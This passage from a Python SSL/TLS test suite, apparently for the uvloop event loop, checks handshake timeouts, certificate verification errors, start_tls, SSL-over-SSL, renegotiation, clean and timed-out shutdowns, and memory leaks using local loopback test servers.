if self.implementation == 'asyncio':
raise unittest.SkipTest()
client_sslctx = self._create_client_ssl_context()
# silence error logger
self.loop.set_exception_handler(lambda *args: None)
def server(sock):
try:
sock.recv_all(1024 * 1024)
except ConnectionAbortedError:
pass
finally:
sock.close()
async def client(addr):
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
ssl_handshake_timeout=1.0)
writer.close()
await self.wait_closed(writer)
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
with self.assertRaisesRegex(
ConnectionAbortedError,
r'SSL handshake.*is taking longer'):
self.loop.run_until_complete(client(srv.addr))
def test_create_connection_ssl_failed_certificate(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
# silence error logger
self.loop.set_exception_handler(lambda *args: None)
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context(disable_verify=False)
def server(sock):
try:
sock.starttls(
sslctx,
server_side=True)
sock.connect()
except (ssl.SSLError, OSError):
pass
finally:
sock.close()
async def client(addr):
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
ssl_handshake_timeout=1.0)
writer.close()
await self.wait_closed(writer)
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
with self.assertRaises(ssl.SSLCertVerificationError):
self.loop.run_until_complete(client(srv.addr))
def test_start_tls_wrong_args(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
async def main():
with self.assertRaisesRegex(TypeError, 'SSLContext, got'):
await self.loop.start_tls(None, None, None)
sslctx = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
with self.assertRaisesRegex(TypeError, 'is not supported'):
await self.loop.start_tls(None, None, sslctx)
self.loop.run_until_complete(main())
def test_ssl_handshake_timeout(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
# bpo-29970: Check that a connection is aborted if handshake is not
# completed in timeout period, instead of remaining open indefinitely
client_sslctx = self._create_client_ssl_context()
# silence error logger
messages = []
self.loop.set_exception_handler(lambda loop, ctx: messages.append(ctx))
server_side_aborted = False
def server(sock):
nonlocal server_side_aborted
try:
sock.recv_all(1024 * 1024)
except ConnectionAbortedError:
server_side_aborted = True
finally:
sock.close()
async def client(addr):
await asyncio.wait_for(
self.loop.create_connection(
asyncio.Protocol,
*addr,
ssl=client_sslctx,
server_hostname='',
ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT
),
0.5
)
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
with self.assertRaises(asyncio.TimeoutError):
self.loop.run_until_complete(client(srv.addr))
self.assertTrue(server_side_aborted)
# Python issue #23197: cancelling a handshake must not raise an
# exception or log an error, even if the handshake failed
self.assertEqual(messages, [])
def test_ssl_handshake_connection_lost(self):
# #246: make sure that no connection_lost() is called before
# connection_made() is called first
client_sslctx = self._create_client_ssl_context()
# silence error logger
self.loop.set_exception_handler(lambda loop, ctx: None)
connection_made_called = False
connection_lost_called = False
def server(sock):
sock.recv(1024)
# break the connection during handshake
sock.close()
class ClientProto(asyncio.Protocol):
def connection_made(self, transport):
nonlocal connection_made_called
connection_made_called = True
def connection_lost(self, exc):
nonlocal connection_lost_called
connection_lost_called = True
async def client(addr):
await self.loop.create_connection(
ClientProto,
*addr,
ssl=client_sslctx,
                server_hostname='')
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
with self.assertRaises(ConnectionResetError):
self.loop.run_until_complete(client(srv.addr))
if connection_lost_called:
if connection_made_called:
self.fail("unexpected call to connection_lost()")
else:
self.fail("unexpected call to connection_lost() without"
"calling connection_made()")
elif connection_made_called:
self.fail("unexpected call to connection_made()")
def test_ssl_connect_accepted_socket(self):
if hasattr(ssl, 'PROTOCOL_TLS'):
proto = ssl.PROTOCOL_TLS
else:
proto = ssl.PROTOCOL_SSLv23
server_context = ssl.SSLContext(proto)
server_context.load_cert_chain(self.ONLYCERT, self.ONLYKEY)
if hasattr(server_context, 'check_hostname'):
server_context.check_hostname = False
server_context.verify_mode = ssl.CERT_NONE
client_context = ssl.SSLContext(proto)
if hasattr(server_context, 'check_hostname'):
client_context.check_hostname = False
client_context.verify_mode = ssl.CERT_NONE
Test_UV_TCP.test_connect_accepted_socket(
self, server_context, client_context)
def test_start_tls_client_corrupted_ssl(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
self.loop.set_exception_handler(lambda loop, ctx: None)
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
def server(sock):
orig_sock = sock.dup()
try:
sock.starttls(
sslctx,
server_side=True)
sock.sendall(b'A\n')
sock.recv_all(1)
orig_sock.send(b'please corrupt the SSL connection')
except ssl.SSLError:
pass
finally:
sock.close()
orig_sock.close()
async def client(addr):
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
self.assertEqual(await reader.readline(), b'A\n')
writer.write(b'B')
with self.assertRaises(ssl.SSLError):
await reader.readline()
writer.close()
try:
await self.wait_closed(writer)
except ssl.SSLError:
pass
return 'OK'
with self.tcp_server(server,
max_clients=1,
backlog=1) as srv:
res = self.loop.run_until_complete(client(srv.addr))
self.assertEqual(res, 'OK')
def test_start_tls_client_reg_proto_1(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
def serve(sock):
sock.settimeout(self.TIMEOUT)
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.starttls(server_context, server_side=True)
sock.sendall(b'O')
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.unwrap()
sock.close()
class ClientProto(asyncio.Protocol):
def __init__(self, on_data, on_eof):
self.on_data = on_data
self.on_eof = on_eof
self.con_made_cnt = 0
def connection_made(proto, tr):
proto.con_made_cnt += 1
# Ensure connection_made gets called only once.
self.assertEqual(proto.con_made_cnt, 1)
def data_received(self, data):
self.on_data.set_result(data)
def eof_received(self):
self.on_eof.set_result(True)
async def client(addr):
await asyncio.sleep(0.5)
on_data = self.loop.create_future()
on_eof = self.loop.create_future()
tr, proto = await self.loop.create_connection(
lambda: ClientProto(on_data, on_eof), *addr)
tr.write(HELLO_MSG)
new_tr = await self.loop.start_tls(tr, proto, client_context)
self.assertEqual(await on_data, b'O')
new_tr.write(HELLO_MSG)
await on_eof
new_tr.close()
with self.tcp_server(serve, timeout=self.TIMEOUT) as srv:
self.loop.run_until_complete(
asyncio.wait_for(client(srv.addr), timeout=10))
def test_create_connection_memory_leak(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
def serve(sock):
sock.settimeout(self.TIMEOUT)
sock.starttls(server_context, server_side=True)
sock.sendall(b'O')
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.unwrap()
sock.close()
class ClientProto(asyncio.Protocol):
def __init__(self, on_data, on_eof):
self.on_data = on_data
self.on_eof = on_eof
self.con_made_cnt = 0
def connection_made(proto, tr):
# XXX: We assume user stores the transport in protocol
proto.tr = tr
proto.con_made_cnt += 1
# Ensure connection_made gets called only once.
self.assertEqual(proto.con_made_cnt, 1)
def data_received(self, data):
self.on_data.set_result(data)
def eof_received(self):
self.on_eof.set_result(True)
async def client(addr):
await asyncio.sleep(0.5)
on_data = self.loop.create_future()
on_eof = self.loop.create_future()
tr, proto = await self.loop.create_connection(
lambda: ClientProto(on_data, on_eof), *addr,
ssl=client_context)
self.assertEqual(await on_data, b'O')
tr.write(HELLO_MSG)
await on_eof
tr.close()
with self.tcp_server(serve, timeout=self.TIMEOUT) as srv:
self.loop.run_until_complete(
asyncio.wait_for(client(srv.addr), timeout=10))
# No garbage is left for SSL client from loop.create_connection, even
# if user stores the SSLTransport in corresponding protocol instance
client_context = weakref.ref(client_context)
self.assertIsNone(client_context())
def test_start_tls_client_buf_proto_1(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
client_con_made_calls = 0
def serve(sock):
sock.settimeout(self.TIMEOUT)
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.starttls(server_context, server_side=True)
sock.sendall(b'O')
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.sendall(b'2')
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.unwrap()
sock.close()
class ClientProtoFirst(asyncio.BaseProtocol):
def __init__(self, on_data):
self.on_data = on_data
self.buf = bytearray(1)
def connection_made(self, tr):
nonlocal client_con_made_calls
client_con_made_calls += 1
def get_buffer(self, sizehint):
return self.buf
def buffer_updated(self, nsize):
assert nsize == 1
self.on_data.set_result(bytes(self.buf[:nsize]))
def eof_received(self):
pass
class ClientProtoSecond(asyncio.Protocol):
def __init__(self, on_data, on_eof):
self.on_data = on_data
self.on_eof = on_eof
self.con_made_cnt = 0
def connection_made(self, tr):
nonlocal client_con_made_calls
client_con_made_calls += 1
def data_received(self, data):
self.on_data.set_result(data)
def eof_received(self):
self.on_eof.set_result(True)
async def client(addr):
await asyncio.sleep(0.5)
on_data1 = self.loop.create_future()
on_data2 = self.loop.create_future()
on_eof = self.loop.create_future()
tr, proto = await self.loop.create_connection(
lambda: ClientProtoFirst(on_data1), *addr)
tr.write(HELLO_MSG)
new_tr = await self.loop.start_tls(tr, proto, client_context)
self.assertEqual(await on_data1, b'O')
new_tr.write(HELLO_MSG)
new_tr.set_protocol(ClientProtoSecond(on_data2, on_eof))
self.assertEqual(await on_data2, b'2')
new_tr.write(HELLO_MSG)
await on_eof
new_tr.close()
# connection_made() should be called only once -- when
# we establish connection for the first time. Start TLS
# doesn't call connection_made() on application protocols.
self.assertEqual(client_con_made_calls, 1)
with self.tcp_server(serve, timeout=self.TIMEOUT) as srv:
self.loop.run_until_complete(
asyncio.wait_for(client(srv.addr),
timeout=self.TIMEOUT))
def test_start_tls_slow_client_cancel(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
client_context = self._create_client_ssl_context()
server_waits_on_handshake = self.loop.create_future()
def serve(sock):
sock.settimeout(self.TIMEOUT)
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
try:
self.loop.call_soon_threadsafe(
server_waits_on_handshake.set_result, None)
data = sock.recv_all(1024 * 1024)
except ConnectionAbortedError:
pass
finally:
sock.close()
class ClientProto(asyncio.Protocol):
def __init__(self, on_data, on_eof):
self.on_data = on_data
self.on_eof = on_eof
self.con_made_cnt = 0
def connection_made(proto, tr):
proto.con_made_cnt += 1
# Ensure connection_made gets called only once.
self.assertEqual(proto.con_made_cnt, 1)
def data_received(self, data):
self.on_data.set_result(data)
def eof_received(self):
self.on_eof.set_result(True)
async def client(addr):
await asyncio.sleep(0.5)
on_data = self.loop.create_future()
on_eof = self.loop.create_future()
tr, proto = await self.loop.create_connection(
lambda: ClientProto(on_data, on_eof), *addr)
tr.write(HELLO_MSG)
await server_waits_on_handshake
with self.assertRaises(asyncio.TimeoutError):
await asyncio.wait_for(
self.loop.start_tls(tr, proto, client_context),
0.5)
with self.tcp_server(serve, timeout=self.TIMEOUT) as srv:
self.loop.run_until_complete(
asyncio.wait_for(client(srv.addr), timeout=10))
def test_start_tls_server_1(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
HELLO_MSG = b'1' * self.PAYLOAD_SIZE
server_context = self._create_server_ssl_context(
self.ONLYCERT, self.ONLYKEY)
client_context = self._create_client_ssl_context()
def client(sock, addr):
sock.settimeout(self.TIMEOUT)
sock.connect(addr)
data = sock.recv_all(len(HELLO_MSG))
self.assertEqual(len(data), len(HELLO_MSG))
sock.starttls(client_context)
sock.sendall(HELLO_MSG)
sock.unwrap()
sock.close()
class ServerProto(asyncio.Protocol):
def __init__(self, on_con, on_eof, on_con_lost):
self.on_con = on_con
self.on_eof = on_eof
self.on_con_lost = on_con_lost
self.data = b''
def connection_made(self, tr):
self.on_con.set_result(tr)
def data_received(self, data):
self.data += data
def eof_received(self):
self.on_eof.set_result(1)
def connection_lost(self, exc):
if exc is None:
self.on_con_lost.set_result(None)
else:
self.on_con_lost.set_exception(exc)
async def main(proto, on_con, on_eof, on_con_lost):
tr = await on_con
tr.write(HELLO_MSG)
self.assertEqual(proto.data, b'')
new_tr = await self.loop.start_tls(
tr, proto, server_context,
server_side=True,
ssl_handshake_timeout=self.TIMEOUT)
await on_eof
await on_con_lost
self.assertEqual(proto.data, HELLO_MSG)
new_tr.close()
async def run_main():
on_con = self.loop.create_future()
on_eof = self.loop.create_future()
on_con_lost = self.loop.create_future()
proto = ServerProto(on_con, on_eof, on_con_lost)
server = await self.loop.create_server(
lambda: proto, '127.0.0.1', 0)
addr = server.sockets[0].getsockname()
with self.tcp_client(lambda sock: client(sock, addr),
timeout=self.TIMEOUT):
await asyncio.wait_for(
main(proto, on_con, on_eof, on_con_lost),
timeout=self.TIMEOUT)
server.close()
await server.wait_closed()
self.loop.run_until_complete(run_main())
def test_create_server_ssl_over_ssl(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest('asyncio does not support SSL over SSL')
CNT = 0 # number of clients that were successful
TOTAL_CNT = 25 # total number of clients that test will create
TIMEOUT = 20.0 # timeout for this test
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
sslctx_1 = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx_1 = self._create_client_ssl_context()
sslctx_2 = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx_2 = self._create_client_ssl_context()
clients = []
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(len(A_DATA))
self.assertEqual(data, A_DATA)
writer.write(b'OK')
data = await reader.readexactly(len(B_DATA))
self.assertEqual(data, B_DATA)
writer.writelines([b'SP', bytearray(b'A'), memoryview(b'M')])
await writer.drain()
writer.close()
CNT += 1
class ServerProtocol(asyncio.StreamReaderProtocol):
def connection_made(self, transport):
super_ = super()
transport.pause_reading()
fut = self._loop.create_task(self._loop.start_tls(
transport, self, sslctx_2, server_side=True))
def cb(_):
try:
tr = fut.result()
except Exception as ex:
super_.connection_lost(ex)
else:
super_.connection_made(tr)
fut.add_done_callback(cb)
def server_protocol_factory():
reader = asyncio.StreamReader()
protocol = ServerProtocol(reader, handle_client)
return protocol
async def test_client(addr):
fut = asyncio.Future()
def prog(sock):
try:
sock.connect(addr)
sock.starttls(client_sslctx_1)
# because wrap_socket() doesn't work correctly on
# SSLSocket, we have to do the 2nd level SSL manually
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = client_sslctx_2.wrap_bio(incoming, outgoing)
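                    # The MemoryBIO pair lets the test drive the inner TLS
                    # session by hand: do() retries an SSLObject call, pumping
                    # bytes between the BIOs and the already-encrypted outer
                    # socket until it stops raising SSLWantReadError.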
def do(func, *args):
while True:
try:
rv = func(*args)
break
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(65536))
if outgoing.pending:
sock.send(outgoing.read())
return rv
do(sslobj.do_handshake)
do(sslobj.write, A_DATA)
data = do(sslobj.read, 2)
self.assertEqual(data, b'OK')
do(sslobj.write, B_DATA)
data = b''
while True:
chunk = do(sslobj.read, 4)
if not chunk:
break
data += chunk
self.assertEqual(data, b'SPAM')
do(sslobj.unwrap)
sock.close()
except Exception as ex:
self.loop.call_soon_threadsafe(fut.set_exception, ex)
sock.close()
else:
self.loop.call_soon_threadsafe(fut.set_result, None)
client = self.tcp_client(prog)
client.start()
clients.append(client)
await fut
async def start_server():
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
srv = await self.loop.create_server(
server_protocol_factory,
'127.0.0.1', 0,
family=socket.AF_INET,
ssl=sslctx_1,
**extras)
try:
srv_socks = srv.sockets
self.assertTrue(srv_socks)
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(asyncio.gather(*tasks), TIMEOUT)
finally:
self.loop.call_soon(srv.close)
await srv.wait_closed()
with self._silence_eof_received_warning():
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
for client in clients:
client.stop()
def test_renegotiation(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest('asyncio does not support renegotiation')
CNT = 0
TOTAL_CNT = 25
A_DATA = b'A' * 1024 * 1024
B_DATA = b'B' * 1024 * 1024
sslctx = openssl_ssl.Context(openssl_ssl.TLSv1_2_METHOD)
if hasattr(openssl_ssl, 'OP_NO_SSLV2'):
sslctx.set_options(openssl_ssl.OP_NO_SSLV2)
sslctx.use_privatekey_file(self.ONLYKEY)
sslctx.use_certificate_chain_file(self.ONLYCERT)
client_sslctx = self._create_client_ssl_context()
if hasattr(ssl, 'OP_NO_TLSv1_3'):
client_sslctx.options |= ssl.OP_NO_TLSv1_3
def server(sock):
conn = openssl_ssl.Connection(sslctx, sock)
conn.set_accept_state()
data = b''
while len(data) < len(A_DATA):
try:
chunk = conn.recv(len(A_DATA) - len(data))
if not chunk:
break
data += chunk
except openssl_ssl.WantReadError:
pass
self.assertEqual(data, A_DATA)
conn.renegotiate()
if conn.renegotiate_pending():
conn.send(b'OK')
else:
conn.send(b'ER')
data = b''
while len(data) < len(B_DATA):
try:
chunk = conn.recv(len(B_DATA) - len(data))
if not chunk:
break
data += chunk
except openssl_ssl.WantReadError:
pass
self.assertEqual(data, B_DATA)
if conn.renegotiate_pending():
conn.send(b'ERRO')
else:
conn.send(b'SPAM')
conn.shutdown()
async def client(addr):
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
**extras)
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(B_DATA)
self.assertEqual(await reader.readexactly(4), b'SPAM')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
async def client_sock(addr):
sock = socket.socket()
sock.connect(addr)
reader, writer = await asyncio.open_connection(
sock=sock,
ssl=client_sslctx,
server_hostname='')
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
writer.write(B_DATA)
self.assertEqual(await reader.readexactly(4), b'SPAM')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
sock.close()
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(
asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
with self._silence_eof_received_warning():
run(client)
with self._silence_eof_received_warning():
run(client_sock)
def test_shutdown_timeout(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
CNT = 0 # number of clients that were successful
TOTAL_CNT = 25 # total number of clients that test will create
TIMEOUT = 10.0 # timeout for this test
A_DATA = b'A' * 1024 * 1024
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
clients = []
async def handle_client(reader, writer):
nonlocal CNT
data = await reader.readexactly(len(A_DATA))
self.assertEqual(data, A_DATA)
writer.write(b'OK')
await writer.drain()
writer.close()
with self.assertRaisesRegex(asyncio.TimeoutError,
'SSL shutdown timed out'):
await reader.read()
CNT += 1
async def test_client(addr):
fut = asyncio.Future()
def prog(sock):
try:
sock.starttls(client_sslctx)
sock.connect(addr)
sock.send(A_DATA)
data = sock.recv_all(2)
self.assertEqual(data, b'OK')
data = sock.recv(1024)
self.assertEqual(data, b'')
fd = sock.detach()
try:
select.select([fd], [], [], 3)
finally:
os.close(fd)
except Exception as ex:
self.loop.call_soon_threadsafe(fut.set_exception, ex)
else:
self.loop.call_soon_threadsafe(fut.set_result, None)
client = self.tcp_client(prog)
client.start()
clients.append(client)
await fut
async def start_server():
extras = {'ssl_handshake_timeout': SSL_HANDSHAKE_TIMEOUT}
if self.implementation != 'asyncio': # or self.PY38
extras['ssl_shutdown_timeout'] = 0.5
srv = await asyncio.start_server(
handle_client,
'127.0.0.1', 0,
family=socket.AF_INET,
ssl=sslctx,
**extras)
try:
srv_socks = srv.sockets
self.assertTrue(srv_socks)
addr = srv_socks[0].getsockname()
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(test_client(addr))
await asyncio.wait_for(
asyncio.gather(*tasks),
TIMEOUT)
finally:
self.loop.call_soon(srv.close)
await srv.wait_closed()
with self._silence_eof_received_warning():
self.loop.run_until_complete(start_server())
self.assertEqual(CNT, TOTAL_CNT)
for client in clients:
client.stop()
def test_shutdown_cleanly(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
CNT = 0
TOTAL_CNT = 25
A_DATA = b'A' * 1024 * 1024
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
def server(sock):
sock.starttls(
sslctx,
server_side=True)
data = sock.recv_all(len(A_DATA))
self.assertEqual(data, A_DATA)
sock.send(b'OK')
sock.unwrap()
sock.close()
async def client(addr):
extras = dict(ssl_handshake_timeout=SSL_HANDSHAKE_TIMEOUT)
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='',
**extras)
writer.write(A_DATA)
self.assertEqual(await reader.readexactly(2), b'OK')
self.assertEqual(await reader.read(), b'')
nonlocal CNT
CNT += 1
writer.close()
await self.wait_closed(writer)
def run(coro):
nonlocal CNT
CNT = 0
with self.tcp_server(server,
max_clients=TOTAL_CNT,
backlog=TOTAL_CNT) as srv:
tasks = []
for _ in range(TOTAL_CNT):
tasks.append(coro(srv.addr))
self.loop.run_until_complete(
asyncio.gather(*tasks))
self.assertEqual(CNT, TOTAL_CNT)
with self._silence_eof_received_warning():
run(client)
def test_write_to_closed_transport(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
future = None
def server(sock):
sock.starttls(sslctx, server_side=True)
sock.shutdown(socket.SHUT_RDWR)
sock.close()
def unwrap_server(sock):
sock.starttls(sslctx, server_side=True)
while True:
try:
sock.unwrap()
break
except ssl.SSLError as ex:
# Since OpenSSL 1.1.1, it raises "application data after
# close notify"
# Python < 3.8:
if ex.reason == 'KRB5_S_INIT':
break
# Python >= 3.8:
if ex.reason == 'APPLICATION_DATA_AFTER_CLOSE_NOTIFY':
break
raise ex
except OSError as ex:
# OpenSSL < 1.1.1
if ex.errno != 0:
raise
sock.close()
async def client(addr):
nonlocal future
future = self.loop.create_future()
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
writer.write(b'I AM WRITING NOWHERE1' * 100)
try:
data = await reader.read()
self.assertEqual(data, b'')
except (ConnectionResetError, BrokenPipeError):
pass
for i in range(25):
writer.write(b'I AM WRITING NOWHERE2' * 100)
self.assertEqual(
writer.transport.get_write_buffer_size(), 0)
await future
writer.close()
await self.wait_closed(writer)
def run(meth):
def wrapper(sock):
try:
meth(sock)
except Exception as ex:
self.loop.call_soon_threadsafe(future.set_exception, ex)
else:
self.loop.call_soon_threadsafe(future.set_result, None)
return wrapper
with self._silence_eof_received_warning():
with self.tcp_server(run(server)) as srv:
self.loop.run_until_complete(client(srv.addr))
with self.tcp_server(run(unwrap_server)) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_flush_before_shutdown(self):
if self.implementation == 'asyncio':
raise unittest.SkipTest()
CHUNK = 1024 * 128
SIZE = 32
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
sslctx_openssl = openssl_ssl.Context(openssl_ssl.TLSv1_2_METHOD)
if hasattr(openssl_ssl, 'OP_NO_SSLV2'):
sslctx_openssl.set_options(openssl_ssl.OP_NO_SSLV2)
sslctx_openssl.use_privatekey_file(self.ONLYKEY)
sslctx_openssl.use_certificate_chain_file(self.ONLYCERT)
client_sslctx = self._create_client_ssl_context()
if hasattr(ssl, 'OP_NO_TLSv1_3'):
client_sslctx.options |= ssl.OP_NO_TLSv1_3
future = None
def server(sock):
sock.starttls(sslctx, server_side=True)
self.assertEqual(sock.recv_all(4), b'ping')
sock.send(b'pong')
            time.sleep(0.5)  # give the TCP send buffer a chance to fill up
data = sock.recv_all(CHUNK * SIZE)
self.assertEqual(len(data), CHUNK * SIZE)
sock.close()
def run(meth):
def wrapper(sock):
try:
meth(sock)
except Exception as ex:
self.loop.call_soon_threadsafe(future.set_exception, ex)
else:
self.loop.call_soon_threadsafe(future.set_result, None)
return wrapper
async def client(addr):
nonlocal future
future = self.loop.create_future()
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
sslprotocol = writer.get_extra_info('uvloop.sslproto')
writer.write(b'ping')
data = await reader.readexactly(4)
self.assertEqual(data, b'pong')
sslprotocol.pause_writing()
for _ in range(SIZE):
writer.write(b'x' * CHUNK)
writer.close()
sslprotocol.resume_writing()
await self.wait_closed(writer)
try:
data = await reader.read()
self.assertEqual(data, b'')
except ConnectionResetError:
pass
await future
with self.tcp_server(run(server)) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_remote_shutdown_receives_trailing_data(self):
CHUNK = 1024 * 16
SIZE = 8
count = 0
sslctx = self._create_server_ssl_context(self.ONLYCERT, self.ONLYKEY)
client_sslctx = self._create_client_ssl_context()
future = None
filled = threading.Lock()
eof_received = threading.Lock()
def server(sock):
incoming = ssl.MemoryBIO()
outgoing = ssl.MemoryBIO()
sslobj = sslctx.wrap_bio(incoming, outgoing, server_side=True)
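            # Drive the server-side handshake manually over MemoryBIOs: flush
            # whatever the SSLObject queued into `outgoing` to the socket and
            # feed raw bytes from the socket into `incoming` until
            # do_handshake() stops raising SSLWantReadError.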
while True:
try:
sslobj.do_handshake()
except ssl.SSLWantReadError:
if outgoing.pending:
sock.send(outgoing.read())
incoming.write(sock.recv(16384))
else:
if outgoing.pending:
sock.send(outgoing.read())
break
while True:
try:
data = sslobj.read(4)
except ssl.SSLWantReadError:
incoming.write(sock.recv(16384))
else:
break
self.assertEqual(data, b'ping')
sslobj.write(b'pong')
sock.send(outgoing.read())
data_len = 0
with filled:
# trigger peer's resume_writing()
incoming.write(sock.recv(65536 * 4))
while True:
try:
chunk = len(sslobj.read(16384))
data_len += chunk
except ssl.SSLWantReadError:
break
# send close_notify but don't wait for response
with self.assertRaises(ssl.SSLWantReadError):
sslobj.unwrap()
sock.send(outgoing.read())
with eof_received:
# should receive all data
while True:
try:
chunk = len(sslobj.read(16384))
data_len += chunk
except ssl.SSLWantReadError:
incoming.write(sock.recv(16384))
if not incoming.pending:
# EOF received
break
except ssl.SSLZeroReturnError:
break
self.assertEqual(data_len, CHUNK * count)
if self.implementation == 'uvloop':
# Verify that close_notify is received. asyncio is currently
# not guaranteed to send close_notify before dropping off
sslobj.unwrap()
sock.close()
async def client(addr):
nonlocal future, count
future = self.loop.create_future()
with eof_received:
with filled:
reader, writer = await asyncio.open_connection(
*addr,
ssl=client_sslctx,
server_hostname='')
writer.write(b'ping')
data = await reader.readexactly(4)
self.assertEqual(data, b'pong')
count = 0
try:
while True:
writer.write(b'x' * CHUNK)
count += 1
await asyncio.wait_for(
asyncio.ensure_future(writer.drain()), 0.5)
except asyncio.TimeoutError:
# fill write backlog in a hacky way for uvloop
if self.implementation == 'uvloop':
for _ in range(SIZE):
writer.transport._test__append_write_backlog(
b'x' * CHUNK)
count += 1
data = await reader.read()
self.assertEqual(data, b'')
await future
writer.close()
await self.wait_closed(writer)
def run(meth):
def wrapper(sock):
try:
meth(sock)
except Exception as ex:
self.loop.call_soon_threadsafe(future.set_exception, ex)
else:
self.loop.call_soon_threadsafe(future.set_result, None)
return wrapper
with self.tcp_server(run(server)) as srv:
self.loop.run_until_complete(client(srv.addr))
def test_connect_timeout_warning(self):
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
addr = s.getsockname()
async def test():
try:
await asyncio.wait_for(
self.loop.create_connection(asyncio.Protocol,
*addr, ssl=True),
0.1)
except (ConnectionRefusedError, asyncio.TimeoutError):
pass
else:
self.fail('TimeoutError is not raised')
with s:
try:
with self.assertWarns(ResourceWarning) as cm:
self.loop.run_until_complete(test())
gc.collect()
gc.collect()
gc.collect()
except AssertionError as e:
self.assertEqual(str(e), 'ResourceWarning not triggered')
else:
self.fail('Unexpected ResourceWarning: {}'.format(cm.warning))
def test_handshake_timeout_handler_leak(self):
if self.implementation == 'asyncio':
# Okay this turns out to be an issue for asyncio.sslproto too
raise unittest.SkipTest()
s = socket.socket(socket.AF_INET)
s.bind(('127.0.0.1', 0))
s.listen(1)
addr = s.getsockname()
async def test(ctx):
try:
await asyncio.wait_for(
self.loop.create_connection(asyncio.Protocol, *addr,
ssl=ctx),
0.1)
except (ConnectionRefusedError, asyncio.TimeoutError):
pass
else:
self.fail('TimeoutError is not raised')
with s:
ctx = ssl.create_default_context()
self.loop.run_until_complete(test(ctx))
ctx = weakref.ref(ctx)
# SSLProtocol should be DECREF to 0
self.assertIsNone(ctx())
def test_shutdown_timeout_handler_leak(self):
